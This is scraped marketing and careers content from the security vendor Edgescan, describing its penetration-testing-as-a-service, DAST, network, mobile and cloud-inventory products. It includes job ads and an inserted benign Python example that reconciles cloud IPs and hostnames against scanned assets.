- Integrates with existing tools: Edgescan provides verified vulnerability data to your existing CI/CD tool stack so developers and operations teams have the critical data they need earlier in the software development lifecycle. The platform integrates alerts and notifications with your installed third-party systems for complete visibility across your tool stack.
- Customizable reporting: enables auditing and trend analysis by tracking closed vulnerabilities, vulnerability age, posture status, and many other security metrics. Also create API-based reporting for GRC integrations per asset. No more sifting through pages of data and clunky PDFs.
- Unlimited and on-demand vulnerability assessments and retesting: retest as often as needed to verify mitigation at no additional cost, providing peace of mind.

Edgescan Dynamic Application Security Testing (DAST) is a software as a service, sold as an annual subscription.

### Penetration Testing as a Service

Penetration Testing as a Service (PTaaS): Human Experts + Automation + Analytics + AI

On-demand penetration testing with unlimited retests, expert remediation guidance, proven exploits, validated risk, streamlined reports, and unlimited vulnerability assessments.

#### Unique Hybrid Approach

Our penetration testing as a service (PTaaS) is a hybrid solution that combines the breadth of automation with the depth of human assessment, integrated with advanced vulnerability management and cyber analytics. The pen testing platform includes in-depth validated vulnerability assessments, automatically validates risk, and then rates that risk against a suite of risk databases. PTaaS can be used to assess web applications, APIs and network/cloud devices.

#### Certified Experts Bring Intelligence

This is where the Edgescan advantage comes into full play. The unique intelligence behind the hybrid penetration testing solution comes from our team of security experts, who are battle-hardened and hold industry accreditations such as CREST, OSCP and CEH. Their experience and expertise provide critical insight which uniquely supplements our automated penetration testing platform.
#### We provide real and actionable results

Our hybrid process of advanced scanning automation and cyber analytics combined with human intelligence is what differentiates us from scanning tools and traditional pen testing services.

#### How it works

PTaaS is powered by Edgescan's suite of solutions. The scanning engine speeds up and assists with reconnaissance and discovery, allowing Edgescan to scale continuous testing without sacrificing accuracy.

1. During an assessment, the Edgescan validation engine queries millions of vulnerability examples stored in our data lake.
2. Vulnerability data is then run through our proprietary analytics models to determine whether the vulnerability is a true positive.
3. If it meets a certain numeric threshold, it is released to the customer; we call this an auto-commit vulnerability.
4. If the confidence level falls below the threshold, or the vulnerability is of critical or high severity, then the vulnerability is flagged for expert validation by an Edgescan security analyst.

#### Organizations lack the skills to conduct penetration tests

67% of organizations say they do not have the necessary skills to conduct thorough penetration tests. This statistic is drawn from the Ponemon Institute's report on the state of penetration testing, emphasizing a critical gap in expertise within organizations.

#### Benefits of using a PTaaS testing solution

- Certified experts: Edgescan is a CREST-certified organization, combining years of experience with top industry accreditations to deliver an industry-recognized service.
- Customizable reporting: enables auditing and trend analysis by tracking closed vulnerabilities, vulnerability age, posture status, and many other security metrics. You can also create API-based reporting for GRC integrations per asset. No more sifting through pages of data and clunky PDFs.
- Premium support: dedicated support from a certified pen testing team. AI Insights provides real-time tactical advice to assist in immediate security posture improvement.
- Depth and breadth of coverage: includes Edgescan DAST, Edgescan DAST for APIs, and/or Network Vulnerability Management for the underlying hosting infrastructure.

Edgescan Penetration Testing as a Service (PTaaS) is a software as a service, sold as an annual subscription.

#### Types of penetration testing

- API PTaaS: continuous assessment using a combination of automated tooling, smart API-specific security automation and certified CREST/OSCP expertise. On-demand penetration testing coupled with continuous vulnerability assessment, exposure validation, risk rating and support.
- Application PTaaS: continuous web application assessment using a combination of automated tooling and certified CREST/OSCP expertise. On-demand penetration testing coupled with continuous vulnerability assessment, exposure validation, risk rating and support. Authenticated and unauthenticated testing for complete web application coverage.
- Network/Device PTaaS: continuous internal and external assessments of networks, hosts and devices, using a combination of automated tooling and certified CREST/OSCP expertise. On-demand penetration testing coupled with continuous vulnerability assessment, exposure validation, risk rating and support. Authenticated and unauthenticated testing for complete coverage.

#### Penetration Testing as a Service FAQs

How does the cost-effectiveness of Penetration Testing as a Service compare to maintaining an internal pen testing team?
Cost-effectiveness depends on several factors, including:

- size of the organization
- scope of the target testing area
- complexity of the environment
- methodology used in testing
- retesting and remediation support
- skill set of the pen testing team

In many cases, Penetration Testing as a Service (PTaaS) is more cost-effective than conducting pen testing internally with existing resources. On average, pen testing as a service can reduce costs by as much as 30%, and save countless hours for customers. For large, established enterprises with appropriate staffing and significant industry expertise, PTaaS increases the cost-effectiveness, accuracy, and productivity of in-house testing. Organizations of all sizes benefit from:

- reduced overhead for SecOps teams and full-time employees
- service delivered by an experienced, full-time expert team
- accurate results validated by a team dedicated to vulnerability intelligence
- unbiased assessment from a third party
- extended knowledge of and familiarity with new products and technologies
- meeting compliance regulations: HIPAA, PCI DSS, TIBER-EU, CBEST, SOC 2, ISO 2700, etc.
- faster time to discovery and remediation
- unlimited retesting
- remediation support from certified experts
- greater scale, agility, risk awareness, and organizational resilience

The additional knowledge and expertise provided by PTaaS complements that of most organizations’ IT security teams and helps maintain industry compliance. Providing real and actionable, risk-rated results with prioritized remediation expedites and optimizes the whole testing process. Furthermore, the cost of employing PTaaS compares favourably with the cost and ramifications of a data breach caused by an unknown security loophole not discovered by internal pen testers. PTaaS helps ensure better coverage, efficiency, and accuracy, as it is delivered by a team dedicated to vulnerability detection 24x7x365.
Are annual penetration testing services needed, or should pentesting be done more often?

The answers are “yes” and “yes”. Since penetration testing, or “pentesting”, is designed to find exploitable security vulnerabilities and unintentional data exposure, thereby helping organizations manage risk, meet compliance mandates, and maintain safe business continuity, it should be conducted on a regular basis. New vulnerabilities and exploits are discovered weekly, if not daily, and to discover and mitigate the critical ones, pentesting should be executed regularly.

So how often should your organization run pentests? There is no specific, mandatory time frame: it depends on the size and industry of your organization, your available resources, and the scale of testing you want to conduct. Follow what is best for your organization’s overall security strategy and risk tolerance.

How does penetration testing as a service fit into a security program?

Pentesting as a Service (PTaaS) should be an integral component of your overall security strategy. While common security technologies and tools like data encryption (AES), network traffic encryption (TLS), next-gen firewalls (NGFWs), web application firewalls (WAFs), Secure Web Gateways (SWGs), Data Loss Protection (DLP), and Vulnerability Management (VM) all provide tremendous benefit to any enterprise’s security program, pentesting complements these tools and provides a different, but necessary, function.
Pentesting finds exploitable vulnerabilities and unintentional data exposure in hosts, endpoints, applications, web applications and APIs – functions that these tools do not perform. While mostly associated with VM tools, pentesting and vulnerability scanning are not the same. While vulnerability scans provide details on what vulnerabilities are present, penetration tests add more insight by verifying whether these vulnerabilities could be leveraged to gain access within the tested environment. Delivered as a service to offer greater scale, agility, and risk awareness versus traditional onsite pentesting tools and processes, PTaaS provides organizations of all sizes with the ability to expose and mitigate vulnerabilities without the need for significant human (penetration tester) resources.

Penetration testing: How is it done?

While there are many details involved in pentesting, the process can be described in several phases:
- Planning and reconnaissance – pentest goals are defined, and intelligence is gathered (e.g., email server, network and domain names).
- Scanning – tools are used to understand how a target responds to intrusions, typically using both static and dynamic analyses (e.g., SQL injections, brute force attacks).
- Gaining access – attacks are staged to discover the target’s vulnerabilities.
- Maintaining access – Advanced Persistent Threats (APTs) are imitated to verify whether vulnerabilities can be used to maintain access.
- Analysis and device configuration – results are compiled into a report and then used to configure security device settings (e.g., WAFs, NGFW) before tests are run again.

The above process is conducted against externally accessible targets, such as the company’s website, email and domain name servers (DNS), to emulate an outside attacker, as well as against internal targets to imitate a malicious insider or disgruntled employee.
Typically, a combination of automated tools and human-led testing and verification processes is used in any pentesting strategy. The Edgescan PTaaS is a hybrid solution that combines the breadth of automation with the depth of human assessment, integrated with advanced vulnerability management and analytics. PTaaS can be used to assess web applications, APIs and network/cloud devices, utilizing risk rating methodologies to prioritize remediation. The platform employs several risk scoring systems (e.g., CVSS, CISA KEV, EPSS) and our own Edgescan Validated Security Score (EVSS) to risk-rate results.

The Edgescan PTaaS solution utilizes the Edgescan security team’s extensive technical expertise as well as the entire suite of applications within the Edgescan platform to provide vulnerability assessment, exposure validation, and risk ratings. Edgescan security experts offer battle-hardened security experience combined with numerous industry accreditations such as CREST, OSCP, and CEH, to provide clients with deep wisdom and insight to readily resolve their security needs.

What are the basics of penetration testing?

Penetration testing is where a security analyst investigates an IT (Information Technology) system (Web Application, Cloud, Network, API), simulating an attacker, with the aim of finding any exploitable vulnerabilities. It is not uncommon to perform penetration tests on the application layer; however, it also extends into the network, cloud, IoT and API layers. The expected output of such an exercise is a report with detailed information discussing the method of discovery, severity, risk and associated remediation recommendations for the discovered vulnerabilities. Examples of such discovered issues could include code-related weaknesses such as an OWASP Top 10 issue, a combination of host and web application weaknesses which result in a breach if combined, or an authorization issue which could only be discovered by leveraging a logical weakness.
What are the drawbacks of traditional penetration testing?

- It’s labour intensive and expensive.
- It does not scale very well.
- It alone does not keep pace with the rapid pace of change.
- It’s a point-in-time assessment in a changing world.

Traditional penetration testing does not keep pace with changes in your environment or the fact that new vulnerabilities are discovered every day. Today you may look secure; tomorrow a new vulnerability becomes known, and now you have a problem you did not have yesterday, without any of your systems changing!

What are the benefits of penetration testing as a service?

- Rapid: Retesting on demand to verify mitigation at no extra cost.
- Efficient: Low administrative overhead and documentation required to deliver the penetration test.
- Infinite: Continuous, validated assessment with on-demand, deep, expert-driven penetration testing.
- Forecastable: Fixed license-based cost.
- EASM: Continuous monitoring across your entire asset portfolio utilizing our External Attack Surface Management (EASM) solution.
- Event alerts: Alert integration into a variety of alerting and ticketing systems.
- On-demand: On-demand reporting for any period of time per asset, including attestation that the asset underwent a Penetration Test (PTaaS) by certified experts. API-based reporting for GRC integration.
- Reporting: Custom reporting including, e.g., closed vulnerabilities, vulnerability age, posture trending and other security metrics.
- Break down silos of data: Integration of PTaaS output in the same repository as continuous vulnerability management output.
- Remediation tracking: Internal Service Level Agreement (SLA) tracking, designed to help ensure high-severity vulnerabilities are mitigated in a timely manner.
- Prioritization: CISA Known Exploited Vulnerabilities Catalog mapping to help identify high-priority discovered vulnerabilities and aid prioritization.
Reference: https://www.cisa.gov/known-exploited-vulnerabilities-catalog
- Focused: Our security analysts are already familiar with the asset, allowing human expertise to focus on complex and severe vulnerabilities whilst the technical vulnerabilities are discovered by Edgescan scanning technology.

What exactly is Penetration Testing as a Service?

Penetration Testing as a Service (PTaaS) is not automation; that’s scanning. PTaaS is a hybrid solution that leverages human curiosity for depth, automation for breadth, and analytics for verification and risk-based results. It combines the breadth of automation with the depth of human assessment, integrated with advanced vulnerability management and analytics, and it assesses for vulnerabilities which are not discovered by legacy scanning tools, such as authorization or business logic flaws. PTaaS can be used to assess web applications, APIs, cloud assets, and network devices, utilizing risk rating methodologies to prioritize remediation.

With penetration test services, results can be accessed in real time instead of waiting for a report to be developed. When a discovered vulnerability is fixed, one can retest on demand without engaging expensive consultants. Reporting is on demand also. Compare this to a traditional Penetration Test: if you performed a Penetration Test in May, you’d get your results in June and that’s it. Once you get your results, you will no longer know if those vulnerabilities stay fixed or if new issues pop up.

How should a pen tester leverage penetration testing services to prevent a hacker from exploiting a security loophole?

Penetration testers and security experts can utilize Penetration Testing as a Service (PTaaS) as an integral tool in their overall security toolbox.
While already familiar with the process and technologies in pentesting, these security team members can gain the advantage of using a testing service providing multiple benefits, including third-party, unbiased assessment, extended knowledge and familiarity with products and technologies, and faster time to discovery and remediation. With this collaborative approach, the effectiveness of identifying and mitigating security exposures, lateral movement loopholes and more is significantly increased.

How does pen testing as a service enable businesses to accelerate development, guide compliance, and uncover security insights?

Penetration testing as a service (PTaaS) offers greater scale, agility, and risk awareness versus traditional onsite pentesting tools and processes. Penetration testing as a service provides organizations of all sizes with the ability to expose and mitigate vulnerabilities without the need for significant human resources, saving time and costs while maintaining compliance. This enables IT and SecOps teams to focus on enabling and securing their primary business objectives rather than overextending themselves into areas that are not their forte. By employing penetration testing as a service, businesses can accelerate their development and operations, meet compliance mandates, and quickly and accurately discover and mitigate security vulnerabilities based on business risk without hindering the productivity of their organization. PTaaS solutions also provide metrics for education and preventative security.

How can a pen test help IT security leaders make informed decisions to enhance security posture and protect against hackers?

Pentesting, whether deployed internally or delivered as a service, should be an integral component of any organization’s overall security strategy. Pentesting complements other security tools (e.g., NGFW, SWG, DLP, WAF) and provides a different, but necessary, function.
Pentesting finds exploitable vulnerabilities and unintentional data exposure in hosts, endpoints, applications, web applications, and APIs – functions these tools do not perform. The results of a pen test are compiled into a report and then used to configure security device settings (e.g., WAFs, NGFW) before pen tests are run again to verify the appropriate (re)configurations. This last step is key and provides the best insight regarding the effectiveness of the deployed security tools at stopping common attacks like SQL injections, brute force attacks, APTs and more. As a result, IT security leaders typically understand:
- what and where they should ‘fix’ systems first, based on business risk and priorities;
- whether they have the correct security tools in place; and
- whether these tools are configured properly to stop data breaches, lateral threat movement, and more.

All of this information helps establish and strengthen an organization’s overall security posture.

Never compromise threat protection.

### Home

Continuous Security. Validated Results. No Noise.

Edgescan delivers risk-prioritized vulnerability intelligence across applications, APIs, and infrastructure with manual validation baked in.
How Edgescan supports your CTEM program

- Do you need a pen test? Try PTaaS, it’s significantly better.
- Is continuous security testing required? We have your back with DAST.
- Need a next-level exposure management program? Our platform approach delivers.
- Problems with API security testing? We solve that problem.
- Is attack surface visibility a problem? We do that, too, with ASM.
- Do you need Red-Teaming for DORA? We can help!

The Edgescan Platform: Continuous security testing and exposure management

Edgescan's continuous testing platform strengthens your CTEM program with 100% false-positive-free, validated vulnerability intelligence so you can quickly find and fix risks.

Penetration Testing as a Service (PTaaS)

We started by addressing the limitations of traditional penetration testing by offering continuous security testing. Edgescan revolutionized the industry by offering on-demand offensive penetration testing with unlimited retests, expert remediation guidance, proven exploits, validated risk, streamlined reports, and unlimited vulnerability assessments. AI can also optionally be used to assist with prioritization, strategic decisions and improved vulnerability clarity.

Dynamic Application Security Testing (DAST)

Recognizing the gaps in automated vulnerability scanning alone, we added human and AI layers to our service. This ensured our clients received accurate vulnerability risk, minimizing false positives and helping customers prioritize fixes with proven exploits. AI can be enabled to assist with vulnerability clarity, breach probability, and prioritization, and to improve overall context.

Network Vulnerability Management (NVM)

The need for full-stack visibility became clear. Edgescan expanded into network vulnerability intelligence, offering a single validated source of the truth, for better prioritization and mitigation across the entire tech stack.
API Security Testing

As APIs became a major attack vector, clients demanded a better way to secure these assets. We added specialized API discovery and testing, giving customers vital protection for this increasingly critical component of the modern application.

Mobile Application Security Testing (MAST)

The explosion of mobile devices in enterprise environments meant security couldn’t be neglected. Edgescan now includes comprehensive mobile application security testing to address the unique threats that mobile apps often present.

Attack Surface Management (ASM)

Proactive security requires real-time awareness of potential exposure points. We developed attack surface management (ASM) to empower clients with continuous visibility into shadow IT and rogue assets. Newly discovered assets can be security tested immediately from the Edgescan Platform.

2025 Vulnerability Statistics Report: Celebrating a Decade of Security Insights

Customer retention: 95%. Edgescan drives significant improvement to global organizations’ continuous exposure management and security testing programs. We cut through the noise to deliver validated risk and proven exploits to our returning happy clients.

Recommended by reviewers: 98% of Gartner Peer Insight reviewers would recommend Edgescan.

Free Training Courses: Master the Fundamentals of Secure Coding

### Network Vulnerability Management

Detect vulnerabilities. Reduce time-to-fix issues. A single validated source of the truth, for better prioritization and mitigation across cloud, public internet and private networks alike.

Focus on What Matters Most

The increased scope and size of vulnerability datasets means it is of paramount importance to concentrate resources on the most critical issues, and the most critical assets, that pose the greatest threat to the organisation.
The Edgescan Platform contextualizes risk with validated vulnerability intelligence and a proprietary risk score that incorporates EVSS (Edgescan Validated Security Score), EPSS (Exploit Prediction Scoring System), CISA KEV (CISA Known Exploited Vulnerabilities Catalog), CVSS (Common Vulnerability Scoring System) and customer-dependent factors such as industry or department.

Certified Experts Have Your Back

Edgescan security experts (OSCP/CREST) are full-time employees able to provide advisory and guidance around vulnerability details and remediation paths to fix issues when they occur. We effectively become an extension of your network and application security teams. Edgescan support means speaking with a Certified Pen Tester, and we are happy to pass that knowledge to you when you most need it. In addition to this, Edgescan’s AI Insights solution provides real-time tactical advice to assist in immediate security posture improvement. Download the NVM datasheet to learn more.

Take a tour of the Edgescan Platform: the platform that gives you continuous security testing, validated risk and proven exploits that will 100% improve your exposure management program.

The Edgescan Cloudhook feature keeps pace with the dynamic change that exists within cloud environments.

Dealing with false positives can be costly.
The Ponemon Institute reports that the average cost of investigating false positives for an organization is approximately $1.37 million per year.

Benefits of Network Vulnerability Management

- VoIP Service Scanning and Infrastructure Testing: Scanning by hostname, IP, DNS, AWS tagging and more for improved correlation and visibility of internal network scanning.
- Certified Experts: Edgescan is a CREST-certified organization, combining years of experience with top technical accreditations to deliver industry-recognized service.
- 100% Validated Results: False-positive-free vulnerability intelligence prevents wasted cycles between security teams.
- Risk-Based Scoring: Traditional vulnerability risk scoring frameworks, coupled with Edgescan’s Validated Security Score (EVSS) and Edgescan eXposure Factor (EXF), allow users to quickly contextualize and prioritize which vulnerabilities to fix first.

Edgescan Network Vulnerability Management (NVM) is a software as a service, sold as an annual subscription.

AWS internal host tagging allows our clients to tag ephemeral internal hosts in the AWS cloud.

### Videos and Webinars

Video Library

Platform Demo Overview Video: Spend 10 minutes in our platform and see the power of five integrated solutions that work together to provide verified vulnerabilities, automation at scale, and comprehensive human intelligence.

45-Minute Recorded Webinar: Panel Discussion with Forrester. Join us for a lively discussion that covers a broad range of topics, including:
- proactive security strategies
- risk-based vulnerability management
- benefits of a platform solution vs standalone solutions
- the possibility of fully automating VM
- which one to choose if you had only one option: DAST or SAST
- and more!
15-Minute Video: EASM + RBVM + PTaaS = Full Stack Protection. Experience Edgescan's comprehensive three-step approach to securing your attack surface through a succinct 15-minute presentation spotlighting David Kennefick, Global Engineering Principal. See how Edgescan's fully integrated solutions work together to bring you verified vulnerabilities, scale of automation, and depth of human intelligence – all wrapped up into one unified platform.

Continuous Threat Exposure Management (CTEM): Our CTEM platform operates continuously across all five critical stages, providing organizations with real-time visibility into their complete threat exposure landscape and prioritized remediation pathways.

Risk-based Vulnerability Management: In this self-guided tour you'll see what is occurring in the platform as you experience the remediation process.

External Attack Surface Management: Our discovery engine runs continuously, and in conjunction with our vulnerability scanning, to help organizations see their digital footprint and exposures.

On-demand Webinars
- The State of the Market Today, featuring IOActive
- Assessing and Controlling Risk in Enterprise Architecture
- DevOps Best Practices
- OWASP Top Ten
- 2022 Vulnerability Statistics Report Preview
- DBIR 2021 Fireside
- Irish Times | Cyber Security Special

### Cloudhook Integration

Illuminate and eliminate cloud risk

Full visibility across your public cloud

The Cloudhook integration automatically onboards locations present in various cloud environments into the Edgescan platform, giving full visibility across your public cloud.
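The hourly sync that the Cloudhook workflow below describes (retrieve public IPs and hostnames, onboard anything new, stop scanning and remove anything that has vanished) is a reconciliation problem. The following is an added illustration of that reconciliation and is not Edgescan's code: the `CloudLocation`, `PlatformState` and `reconcile` names, the dedicated-versus-grouped asset handling and the two-cycle sample inventory are all constructed here, and the rule that only integration-onboarded locations are ever auto-removed is an assumption added to protect manually added assets.

```python
"""Hourly cloud-location reconciliation modelled on the Cloudhook workflow.

Added example, not Edgescan's code: the types, reconcile() and the sample
inventory are constructed for illustration.
"""
from __future__ import annotations

import ipaddress
from collections.abc import Iterable
from dataclasses import dataclass, field


@dataclass(frozen=True, order=True)
class CloudLocation:
    provider: str  # "aws", "gcp" or "azure"
    kind: str      # "ip" or "hostname"
    value: str     # canonical IP address or hostname


def normalize(provider: str, kind: str, raw: str) -> CloudLocation:
    """Canonicalize a raw inventory entry so consecutive runs compare equal."""
    if kind == "ip":
        value = str(ipaddress.ip_address(raw.strip()))  # rejects garbage, compresses IPv6
    else:
        value = raw.strip().lower().rstrip(".")          # DNS names may carry a trailing dot
    return CloudLocation(provider.lower(), kind, value)


@dataclass
class PlatformState:
    """Assets known to the platform: asset name -> locations attached to it."""
    assets: dict[str, set[CloudLocation]] = field(default_factory=dict)
    # Locations this integration onboarded. Only these may be auto-removed, so a
    # location an operator added by hand is never deleted by the sync (assumption).
    managed: set[CloudLocation] = field(default_factory=set)

    def asset_of(self, loc: CloudLocation) -> str | None:
        return next((name for name, locs in self.assets.items() if loc in locs), None)


def reconcile(discovered: Iterable[CloudLocation], state: PlatformState,
              grouped_asset: str | None = None):
    """One hourly cycle: onboard new locations, retire locations no longer present.

    Returns (onboarded, removed) as sorted lists. With grouped_asset=None every new
    location gets a dedicated asset; otherwise all new locations join that one asset.
    """
    discovered = set(discovered)
    onboarded = sorted(loc for loc in discovered if state.asset_of(loc) is None)
    removed = sorted(loc for loc in state.managed if loc not in discovered)

    for loc in onboarded:
        name = grouped_asset or f"{loc.provider}:{loc.value}"
        state.assets.setdefault(name, set()).add(loc)
        state.managed.add(loc)
    for loc in removed:
        name = state.asset_of(loc)
        state.managed.discard(loc)
        if name is not None:
            state.assets[name].discard(loc)
            if not state.assets[name]:  # last location gone: stop scanning the asset
                del state.assets[name]
    return onboarded, removed


# Constructed sample inventory: what the provider APIs might return on two
# consecutive hourly runs (documentation-range addresses, example.com names).
HOUR_1 = [
    normalize("aws", "ip", "203.0.113.10"),             # EC2 Elastic IP
    normalize("aws", "hostname", "Www.Example.Com."),   # Route53 record, mixed case
    normalize("gcp", "ip", "198.51.100.7"),             # GCP external IP
    normalize("azure", "hostname", "api.example.net"),  # Azure DNS zone record
]
HOUR_2 = [loc for loc in HOUR_1 if loc.value != "198.51.100.7"] + [
    normalize("azure", "ip", "2001:db8::1"),            # new Azure public IP
]


def run_two_cycles():
    """Run the sync twice and return both action sets plus the resulting state."""
    state = PlatformState()
    first = reconcile(HOUR_1, state)    # everything is new: four onboardings
    second = reconcile(HOUR_2, state)   # GCP IP vanished, Azure IP appeared
    return first, second, state


if __name__ == "__main__":
    first, second, state = run_two_cycles()
    print("hour 1 onboarded:", [l.value for l in first[0]])
    print("hour 2 onboarded:", [l.value for l in second[0]], "removed:", [l.value for l in second[1]])
    print("assets now scanned:", sorted(state.assets))
```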
How it works: Provided credentials for a cloud environment, the integration will retrieve all public-facing IPs and hostnames on an hourly basis. If the locations are not currently present on the platform, then they will be onboarded. A location is considered onboarded when it has been added to a licenced asset and is set up for scanning. A location can be added to a dedicated asset, where there is only one location attached to the asset, or a grouped asset, where there are multiple locations present. If a location was previously onboarded but is no longer present in the cloud environment, then scanning will be stopped and the location will be removed from Edgescan.

Integration workflow

What is required? Some configuration settings need to be agreed upon, and credentials for the specified cloud environments are required. Credentials differ for each environment. Everything else is handled by the integration.

How often does it update? Cloudhook runs hourly.

Supported cloud environments:
- AWS: EC2 Elastic IP addresses and Route53 hostnames
- GCP: External IP addresses and Cloud DNS hostnames
- Azure: Public IP addresses and DNS zone hostnames

Onboarding cloud integrations
- AWS Onboarding Integration – STS Authentication
- Keeps your External IP addresses and hostnames from Cloud DNS updated as assets in Edgescan.
- Microsoft Azure Onboarding Integration

### Case Studies

Continuous Security Testing and Exposure Management. See how Edgescan has improved the security posture of organizations like yours.

### Mobile License

Mobile Application Testing: Complete testing coverage for iOS and Android

Built for mobile apps

As organizations increasingly provide mobile applications to enable their remote workforce and boost productivity, their security teams must ensure the safety and integrity of these mobile devices, apps and data.
With the rapid and expanding use of mobile apps in the workforce comes an extended attack surface for cybercriminals to potentially access. Mobile risk assessments discover and examine all assets within your mobile devices and applications to expose vulnerabilities and threats that may jeopardize data security or performance.

A single pane of glass view

Edgescan Mobile expands its industry-leading vulnerability assessment and penetration testing capabilities into mobile environments, providing complete testing coverage for iOS and Android. Using our unique hybrid approach, which provides automated vulnerability intelligence coupled with validation and human expertise, we test all relevant mobile components and provide the results in the Edgescan platform with an intuitive ‘single pane of glass’ view.

How the process works:
- Edgescan starts by ingesting the API components used by mobile devices and applications into its platform.
- Then our vulnerability scanning engine builds a precise profile of each application and runs an assessment of it and of the host-server layer.
- After the initial scan is completed, a manual penetration test is performed against the API/App, to test for business logic vulnerabilities and vulnerabilities that legacy scanners cannot find.
- Edgescan then downloads a build of the native mobile application onto our test devices and begins deep testing and device forensics.
- All results are provided to the Edgescan platform, allowing for unlimited retesting and reporting, while ensuring data is safely stored, transmitted, and secured in your mobile environment.

Increased coverage. High accuracy. Fast remediation.

Features and benefits:
- Full stack security in one platform that combines API vulnerability assessment, pentesting, and mobile forensic analysis in a unified platform – simplifying daily operations.
- Only real, prioritized and actionable results are delivered, eliminating the false positive ‘noise’ – reducing costs and saving time.
- Risk-rated results with prioritized remediation. Employs several risk scoring systems (e.g., CVSS, CISA KEV, EPSS) and our own Validated Security Score to risk-rate results.
- Access to CREST-certified security analysts that will test and expedite the effective implementation of your cloud, network and mobile security strategy.
- Meet compliance – Edgescan is a certified PCI ASV and delivers testing covering the OWASP Top 10, WASC threat classification, and CWE/SANS Top 25.
- Discover and examine all assets within your mobile devices and applications.

Licensing

Edgescan Mobile Assessment is a subscription-based service and includes the following capabilities:
- Forensic analysis on a physical device
- Vulnerability assessment on API/Apps and Network components
- Penetration testing as a service delivered across all components
- Vulnerability assessments are on demand and unlimited
- Unlimited retests on scan results
- Authenticated testing

### Whitepapers

Take charge of your organization's security strategy. Download whitepapers and gain the insights and strategies to protect your organization from cyber attacks.

- A Journey into Smart Vulnerability Management War Room: A comprehensive resource with the latest best practices, tools, and strategies to fortify your organization's cybersecurity defenses.
- Vulnerability Management Maturity Tool: While corporations are advancing to meet the ever-expanding cyber threat, there is uncertainty whether they are actually prepared.
- Does a Hybrid Model for Vulnerability Management Make Sense? Discover how a hybrid model can provide the best of both worlds by leveraging the scalability of the cloud and the control of on-premises solutions.
- The 2021 Verizon DBIR Edgescan Analysis
- Enabling Enterprise Operations with Smart Vulnerability Management: An outline of things to consider if you are serious about enabling your operations to integrate Smart VM in their existing workflows.
- Security Tool Proliferation and Vendor Consolidation: When we look at the actual number of security tools in play for the average enterprise, it's apparent that vendor consolidation is top of mind.
- Can You Have a Single Touchstone of Truth for Your Vulnerability Management Program? Getting to a single touchstone of truth could be the difference between continued operations and a cataclysmic security incident.
- Why Does a Single Full Stack Vulnerability Management Solution Matter? In this paper we will consider ten reasons why single, full stack matters, but first let's agree on what full stack actually means.
- What is Smart Vulnerability Management and Why Does It Matter? There are a number of ways in which Vulnerability Management can be smart – this paper takes a look at six of them.
- The Evolving Attack Surface: The way the attack surface changes is wide and varied – and the chance of human error with every new exposure is equally mixed.
- Resilience to Ransomware: There is no silver bullet, but you can reduce the risk and impact if you’re unfortunate enough to be faced with a breach.

### Enterprise Account Executive

Job Description: Edgescan, a leading cybersecurity company, is seeking an Enterprise Account Executive to support the growth of our enterprise accounts.
The Enterprise Account Executive will be responsible for driving revenue growth within our target accounts, managing the sales process from lead generation to deal closure.

Key Responsibilities:
- Drive revenue growth within enterprise accounts.
- Manage the sales process from lead generation to deal closure.
- Develop and maintain strong relationships with key decision makers and influencers within our enterprise accounts.
- Collaborate with our solutions engineering team to provide technical expertise to prospects and customers.
- Conduct product demonstrations and presentations.
- Prepare proposals and negotiate pricing and contracts.
- Use CRM tools to manage sales pipeline and provide accurate sales forecasting.
- Develop and execute account plans to meet and exceed revenue targets.
- Stay up to date on industry trends and competitive landscape.

Basic Qualifications:
- 10+ years of experience in a sales role, preferably in the cybersecurity or technology industry.
- Proven track record of meeting and exceeding sales targets.
- Experience managing complex sales cycles from lead generation to deal closure.
- Strong communication and presentation skills.
- Ability to work independently and as part of a team.
- Bachelor’s degree in Business Administration, Marketing, or related field.

Additional Qualifications:
- Experience selling to enterprise accounts in the financial services, healthcare, or technology industry.
- Strong understanding of cybersecurity and the threat landscape.
- Familiarity with CRM tools such as Salesforce.

Traits:
- Strong customer/prospect empathy.
- Technical aptitude.
- Consultative; ability and desire to drive value for customers based on unique needs.
- Collaborative; partner across functions.
- Intellectually curious; driven to expand cybersecurity domain and professional expertise.
- Metrics-driven; ability to translate customer needs into achievable goals and operate well in a data-driven environment.

At Edgescan, we believe in providing our employees with opportunities for growth and development. As an Enterprise Account Executive, you will have the opportunity to work with some of the largest and most innovative companies in the world, driving revenue growth and helping our customers protect their critical assets. Join our team today and help us drive growth and innovation in the cybersecurity industry.

### Solutions Engineer

Job Description: Edgescan is seeking a Solutions Engineer to support the growth of our account team and partners with technical sales activities. The Solutions Engineer will serve as a subject matter expert for the Edgescan platform, including Penetration Testing as a Service (PTaaS), Web Application and API Testing (DAST), Network Vulnerability Management (VM), and Attack Surface Management (ASM). This position requires supporting highly complex accounts, gaining access to and managing relationships with executive-level technical staff and decision makers, and understanding market and industry vertical data to provide thought leadership to position the value of the solution.
Key Responsibilities:
- Leverage third parties and/or the channel to create opportunities and position the solution.
- Qualify highly complex sales opportunities in terms of customer technical requirements, competition, decision-making process, and funding.
- Present the design and value of proposed solutions and business cases to customers, prospects, management, directors, and C-level executives.
- Gain access to and manage relationships with executive-level technical staff and decision makers.
- Understand market and industry vertical data to provide thought leadership to position the value of the solution.
- Serve as a subject matter expert for the Edgescan platform, including PTaaS, DAST, VM, and ASM.
- Support highly complex accounts.
- Develop and deliver technical presentations and demonstrations.
- Conduct product evaluations and proof of concept activities.
- Provide technical expertise to the sales team and partners.
- Collaborate with Product Management and Engineering to improve the Edgescan platform.
- Travel to customer and partner sites as needed.

Basic Qualifications:
- 5+ years of experience in a technical sales engineering or solutions engineering role.
- Strong technical background in cybersecurity, including knowledge of PTaaS, DAST, VM, and ASM.
- Experience presenting technical solutions to executive-level technical staff and decision makers.
- Excellent communication and presentation skills.
- Ability to work independently and as part of a team.
- Bachelor’s degree in Computer Science, Information Technology, or related field.

Additional Qualifications:
- Experience working with highly complex accounts.
- Experience working with third-party vendors and/or channel partners.
- Strong problem-solving skills and the ability to think creatively.
- Experience with cloud computing platforms, such as AWS, Azure, or GCP.
- Security certifications, such as OWASP, CREST, OSCP, CISSP, or CEH, are a plus.
Traits:
- Strong customer/prospect empathy.
- Technical aptitude.
- Consultative; ability and desire to drive value for customers based on unique needs.
- Collaborative; partner across functions.
- Intellectually curious; driven to expand cybersecurity domain and professional expertise.
- Metrics-driven; ability to translate customer needs into achievable goals and operate well in a data-driven environment.

At Edgescan, we believe in providing our employees with opportunities for growth and development. As a Solutions Engineer, you will have the opportunity to work with highly complex accounts, gain access to executive level technical staff and decision makers, and present technical solutions to C-level executives. Join our team today and help us drive growth and innovation in the cybersecurity industry. APPLY NOW

### Sales Development Representative

